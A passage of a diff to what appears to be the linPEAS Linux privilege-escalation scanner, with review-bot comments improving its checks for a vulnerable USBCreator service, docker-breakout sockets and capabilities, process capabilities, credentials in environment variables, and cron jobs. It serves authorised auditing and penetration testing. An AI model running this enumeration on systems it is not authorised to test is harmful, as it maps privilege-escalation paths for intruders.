$FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + wait # Always wait at the end + CONT_THREADS=0 #Reset the threads counter + ##### POST SERACH VARIABLES ##### + backup_folders=`echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS" | tr ' ' '\n' | grep -v "/lib" | grep -E "backup$|backups$"` + backup_folders_row="`echo $backup_folders | tr '\n' ' '`" printf $Y"DONE\n"$NC + echo "" fi 
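Review bot: The nine file searches FIND_HOME, FIND_ETC, FIND_VAR, FIND_TMP, FIND_OPT, FIND_USR, FIND_MNT, FIND_PRIVATE and FIND_APPLICATIONS start their expression with the raw `$SNMP_RELEVANT_NAMES` (the string `snmpd.conf`) instead of the prep_to_find output `$FIND_SNMP_RELEVANT_NAMES` that every other term uses; if prep_to_find emits `-name` predicates as the other variables suggest, find takes `snmpd.conf` as an extra starting point and then sees an expression beginning with `-o`, which it rejects, and with stderr discarded each of those searches silently returns nothing. The fix is to replace `$SNMP_RELEVANT_NAMES` with `$FIND_SNMP_RELEVANT_NAMES` in those nine assignments. The HOMESEARCH guard is also never true: its second test greps `$HOMESEARCH`, which always begins with `/home/ /Users/ /root/`, so `$HOME` is never prepended; it should test the home path itself, i.e. `echo "$HOME" | grep -E "^/root|^/home|^/Users"`. Home directories read from /etc/passwd are spliced unquoted into an eval'd find command line, so an entry containing spaces or shell metacharacters is split or interpreted; a comment at HOMESEARCH stating that assumption, or a filter that drops such entries, would be worth adding. The FIND_PRIVATE expression still carries `-O` (capital) before `$FIND_POSTGRESQL_RELEVANT_NAMES`, inherited from the removed line, which find does not accept as a test and which likely empties that search as well.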
@@ -915,29 +977,48 @@ if [ "`echo $CHECKS | grep SysI`" ]; then ########################################### #-------------) System Info (-------------# ########################################### - printf $B"====================================( "$GREEN"System Information"$B" )====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"System Information"$B" ╠════════════════════════════════════\n"$NC #-- SY) OS printf $Y"[+] "$GREEN"Operative system\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits\n"$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -E "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} 
"s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," lsb_release -a 2>/dev/null echo "" #-- SY) Sudo printf $Y"[+] "$GREEN"Sudo version\n"$NC - if [ "`which sudo 2>/dev/null`" ]; then + if [ "`command -v sudo 2>/dev/null`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version\n"$NC - sudo -V 2>/dev/null | grep "Sudo ver" | sed -E "s,$sudovB,${C}[1;31m&${C}[0m," + sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${C}[1;31m&${C}[0m," else echo_not_found "sudo" fi echo "" + #--SY) USBCreator + printf $Y"[+] "$GREEN"USBCreator\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation\n"$NC + if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges 
| grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + fi + fi + fi + echo "" + #-- SY) PATH printf $Y"[+] "$GREEN"PATH\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses\n"$NC - echo $OLDPATH 2>/dev/null | sed -E "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" - echo "New path exported: $PATH" 2>/dev/null | sed -E "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" + echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" echo "" #-- SY) Date 
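Review bot: The USBCreator verdict on the new `if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]` line only fires for a version string that is exactly four characters long, so a version the check's own criterion (major 0, minor below 21) would treat as vulnerable, such as `0.9` or one carrying a distro suffix, is silently reported as safe, and a non-numeric minor makes the unquoted `-lt` comparison error out rather than fail. Drop the length test and require a numeric minor: `pc_minor=$(echo "$pc_version" | cut -d. -f2 | grep -oE "^[0-9]+")` and `if [ "$pc_major" = "0" ] && [ -n "$pc_minor" ] && [ "$pc_minor" -lt 21 ]; then`. The separate `[ ] && [ ]` tests also avoid the deprecated `-a` form inside `[ ]`. The enclosing System Information block starts before this hunk.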
@@ -959,7 +1040,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) Environment vars printf $Y"[+] "$GREEN"Environment\n"$NC printf $B"[i] "$Y"Any private information inside environment variables?\n"$NC - (env || set) 2>/dev/null | grep -v "RELEVANT*\|FIND*\|^VERSION=\|dbuslistG\|mygroups\|ldsoconfdG\|pwd_inside_history\|kernelDCW_Ubuntu_Precise\|kernelDCW_Ubuntu_Trusty\|kernelDCW_Ubuntu_Xenial\|kernelDCW_Rhel\|^sudovB=\|^rootcommon=\|^mounted=\|^mountG=\|^notmounted=\|^mountpermsB=\|^mountpermsG=\|^kernelB=\|^C=\|^RED=\|^GREEN=\|^Y=\|^B=\|^NC=\|TIMEOUT=\|groupsB=\|groupsVB=\|knw_grps=\|sidG\|sidB=\|sidVB=\|sudoB=\|sudoG=\|sudoVB=\|sudocapsB=\|timersG=\|capsB=\|\notExtensions=\|Wfolders=\|writeB=\|writeVB=\|_usrs=\|compiler=\|PWD=\|LS_COLORS=\|pathshG=\|notBackup=\|processesDump\|processesB\|commonrootdirs" | sed -E "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" + (env || set) 2>/dev/null | grep -v "RELEVANT*\|FIND*\|^VERSION=\|dbuslistG\|mygroups\|ldsoconfdG\|pwd_inside_history\|kernelDCW_Ubuntu_Precise\|kernelDCW_Ubuntu_Trusty\|kernelDCW_Ubuntu_Xenial\|kernelDCW_Rhel\|^sudovB=\|^rootcommon=\|^mounted=\|^mountG=\|^notmounted=\|^mountpermsB=\|^mountpermsG=\|^kernelB=\|^C=\|^RED=\|^GREEN=\|^Y=\|^B=\|^NC=\|TIMEOUT=\|groupsB=\|groupsVB=\|knw_grps=\|sidG\|sidB=\|sidVB=\|sudoB=\|sudoG=\|sudoVB=\|sudocapsB=\|timersG=\|capsB=\|\notExtensions=\|Wfolders=\|writeB=\|writeVB=\|_usrs=\|compiler=\|PWD=\|LS_COLORS=\|pathshG=\|notBackup=\|processesDump\|processesB\|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" echo "" #-- SY) Dmesg 
@@ -970,9 +1051,9 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) AppArmor printf $Y"[+] "$GREEN"AppArmor enabled? .............. "$NC - if [ `which aa-status 2>/dev/null` ]; then + if [ `command -v aa-status 2>/dev/null` ]; then aa-status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," - elif [ `which apparmor_status 2>/dev/null` ]; then + elif [ `command -v apparmor_status 2>/dev/null` ]; then apparmor_status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then ls -d /etc/apparmor* 
@@ -1009,13 +1090,24 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) Printer printf $Y"[+] "$GREEN"Printer? ....................... "$NC lpstat -a 2>/dev/null || echo_not_found "lpstat" + + #-- SY) Running in a virtual environment + printf $Y"[+] "$GREEN"Is this a virtual machine? ..... "$NC + hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` + if [ `command -v systemd-detect-virt 2>/dev/null` ]; then + detectedvirt=`systemd-detect-virt` + if [ "$hypervisorflag" ]; then printf $RED"Yes ("$detectedvirt")"$NC; else printf $GREEN"No"$NC; fi + else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi + fi + echo "" #-- SY) Container printf $Y"[+] "$GREEN"Is this a container? ........... "$NC - dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null` + dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; grep -i kubepods /proc/self/cgroup 2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null` lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null` - if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; - elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; + if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; else echo_no fi 
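Review bot: The new virtual-machine check decides solely on the cpuinfo `hypervisor` flag: `detectedvirt` is only used to decorate a "Yes" on the `if [ "$hypervisorflag" ]` line and never turns a "No" into a "Yes", so a guest that `systemd-detect-virt` identifies but whose CPU flags lack `hypervisor` is reported as physical. Per its man page the tool prints `none` when nothing is detected, so its output can serve as a second signal: `detectedvirt=\`systemd-detect-virt 2>/dev/null\`` and `if [ "$hypervisorflag" ] || { [ "$detectedvirt" ] && [ "$detectedvirt" != "none" ]; }; then printf $RED"Yes ("$detectedvirt")"$NC; else printf $GREEN"No"$NC; fi`. The `[ \`command -v systemd-detect-virt 2>/dev/null\` ]` test also leaves the substitution unquoted, like the `which` tests it replaces; `[ -n "\`command -v systemd-detect-virt 2>/dev/null\`" ]` is the safer shape.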
@@ -1032,14 +1124,24 @@ if [ "`echo $CHECKS | grep SysI`" ]; then if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes $containerCounts" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + fi + echo "" + + if [ "$dockercontainer" ] || [ "$dockercontainers" -ne "0" ]; then + printf $Y"[+] "$GREEN"Looking for docker breakout techniques\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout\n"$NC + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${C}[1;31m&${C}[0m,g" + echo "" + ls /var/run/docker.sock 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," + ls /run/docker.sock 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," + find / ! 
-path "/sys/*" -name "docker.sock" -o -name "docker.socket" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," fi - echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi @@ -1049,7 +1151,7 @@ if [ "`echo $CHECKS | grep Devs`" ]; then ########################################### #---------------) Devices (---------------# ########################################### - printf $B"=========================================( "$GREEN"Devices"$B" )==========================================\n"$NC + printf $B"═════════════════════════════════════════╣ "$GREEN"Devices"$B" ╠══════════════════════════════════════════\n"$NC #-- 1D) sd in /dev printf $Y"[+] "$GREEN"Any sd*/disk* disk in /dev? (limit 20)\n"$NC @@ -1060,7 +1162,7 @@ if [ "`echo $CHECKS | grep Devs`" ]; then printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC if [ -f "/etc/fstab" ]; then - cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -E "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -E "s,$notmounted,${C}[1;31m&${C}[0m," | sed -E "s,$mounted,${C}[1;34m&${C}[0m," | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -E "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$mountpermsG,${C}[1;32m&${C}[0m,g" + cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$notmounted,${C}[1;31m&${C}[0m," | sed -${E} "s,$mounted,${C}[1;34m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -${E} "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$mountpermsG,${C}[1;32m&${C}[0m,g" else echo_not_found "/etc/fstab" fi 
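Review bot: In the new docker-breakout block, `find / ! -path "/sys/*" -name "docker.sock" -o -name "docker.socket"` parses as `(! -path /sys/* -and -name docker.sock) -or -name docker.socket`, so the `/sys` exclusion does not apply to the second name; group the names: `find / ! -path "/sys/*" \( -name "docker.sock" -o -name "docker.socket" \) 2>/dev/null`. Note that `! -path` is a test, not a prune, so the walk still descends into `/sys` either way and the exclusion only filters output; `-path /sys -prune -o ...` or `-xdev` would actually stop the descent. The two `ls` lines above cover the usual locations, so the full walk is only a fallback and its cost is worth keeping in mind on large filesystems.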
@@ -1074,11 +1176,11 @@ if [ "`echo $CHECKS | grep AvaSof`" ]; then ########################################### #---------) Available Software (----------# ########################################### - printf $B"====================================( "$GREEN"Available Software"$B" )====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Available Software"$B" ╠════════════════════════════════════\n"$NC #-- 1AS) Useful software printf $Y"[+] "$GREEN"Useful software\n"$NC - which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc rkt kubectl 2>/dev/null + which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null echo "" #-- 2AS) Search for compilers @@ -1094,7 +1196,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### - printf $B"================================( "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" )================================\n"$NC + printf $B"══════════════════════════════╣ "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" ╠════════════════════════════════\n"$NC #-- PCS) Cleaned proccesses printf $Y"[+] "$GREEN"Cleaned processes\n"$NC 
@@ -1104,26 +1206,43 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then printf $B"[i] "$Y"Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC if [ "$NOUSEPS" ]; then - print_ps | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -E "s,$processesDump,${C}[1;31m&${C}[0m," + print_ps | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," pslist=`print_ps` else - ps aux 2>/dev/null | grep -v "\[" | sort | grep -v "%CPU" | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -E "s,$processesDump,${C}[1;31m&${C}[0m," - pslist=`ps aux` + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed 
-${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then + cpid="`echo \"$psline\" | awk '{print $2}'`" + caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m,g" + fi + fi + done + pslist=`ps auxwww` echo "" #-- PCS) Binary processes permissions printf $Y"[+] "$GREEN"Binary processes permissions\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC binW="IniTialiZZinnggg" - ps aux 2>/dev/null | awk '{print $11}' | while read bpath; do + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then binW="$binW|$bpath" fi done - ps aux 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," fi echo "" + #-- PCS) Files opened by processes belonging to other 
users + if ! [ "$IAMROOT" ]; then + printf $Y"[+] "$GREEN"Files opened by processes belonging to other users\n"$NC + printf $B"[i] "$Y"This is usually empty because of the lack of privileges to read other user processes information\n"$NC + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + fi + #-- PCS) Processes with credentials inside memory printf $Y"[+] "$GREEN"Processes with credentials in memory (root req)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory\n"$NC 
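Review bot: The per-process capability decode is skipped with `! [ "\`echo \"$psline\" | grep root\`" ]`, which matches `root` anywhere in the ps line, so a non-root process whose command line merely mentions root (a path under `/root`, an argument like `--user=root`) never has its `CapEff` decoded, while the intent is to skip root-owned processes. Test the user column instead: `if [ "\`command -v capsh\`" ] && [ "\`echo \"$psline\" | awk '{print $1}'\`" != "root" ]; then`. The same substring problem affects the new `lsof 2>/dev/null | grep -v "$USER"`, which drops every line containing the username as a substring, including other users whose name extends it and paths that embed it; `awk -v u="$USER" '$3 != u'` keeps the filter on the USER column (field 3 in default lsof output). Also, `pslist=\`ps auxwww\`` re-runs ps after the loop, so the saved list and the decoded output can disagree for short-lived processes.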
@@ -1146,23 +1265,26 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #-- PCS) Cron printf $Y"[+] "$GREEN"Cron jobs\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs\n"$NC - crontab -l 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - ls -al /etc/cron* 2>/dev/null | sed -E "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - crontab -l -u "$USER" 2>/dev/null + command -v crontab 2>/dev/null || echo_not_found "crontab" + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + command -v incrontab 2>/dev/null || echo_not_found "incrontab" + incrontab -l 2>/dev/null + ls -al /etc/cron* 2>/dev/null | sed -${E} "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." 
